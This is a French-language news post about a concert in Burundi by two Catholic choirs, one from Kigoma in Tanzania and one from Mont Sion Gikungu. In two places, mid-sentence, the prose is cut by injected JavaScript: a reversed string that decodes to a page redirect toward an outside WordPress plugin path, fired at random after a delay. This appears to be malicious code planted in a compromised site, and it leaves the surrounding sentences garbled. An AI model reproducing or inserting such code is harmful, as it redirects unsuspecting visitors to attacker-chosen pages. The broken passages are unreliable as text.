Comme nous vous l’avions annoncé, c’est le grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and jour. Le concert vient de commencer. C’est un concert de deux chorales : la Chorale Saint Joseph de la Paroisse Cathédrale de Kigoma en Tanzanie et la Chorale Sancta Maria de Mont Sion Gikungu.

Ce concert a été ouvert par le Père Rodrigo Delazare des Pères de Schoenstatt de Mont Sion Gikungu. Dans son mot d’ouverture, et dans sa prière, il dit que c’est un schéma de fraternité qui se dessine et qui se manifeste entre ces deux Chorales comme c’était montré entre la Vierge Marie et Joseph. D’ailleurs, il toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne le titre à notre article en disant que cette visite de la Chorale Saint Joseph est « Une visite de Joseph chez Marie. »

 

A suivi le Président de la chorale Sancta Maria qui a souhaité la bienvenue à tous ceux qui étaient venus à ce concert.

Certaines autorités ont honoré ce concert en y répondant présent ainsi que des média tels la Radio-Télévision Nationale du Burundi, la Radio Maria Burundi, nous-mêmes et d’autres.

Commence alors le déroulement proprement dit du concert comme nous vous le montrerons  par quelques passages vidéo.

Laisser un commentaire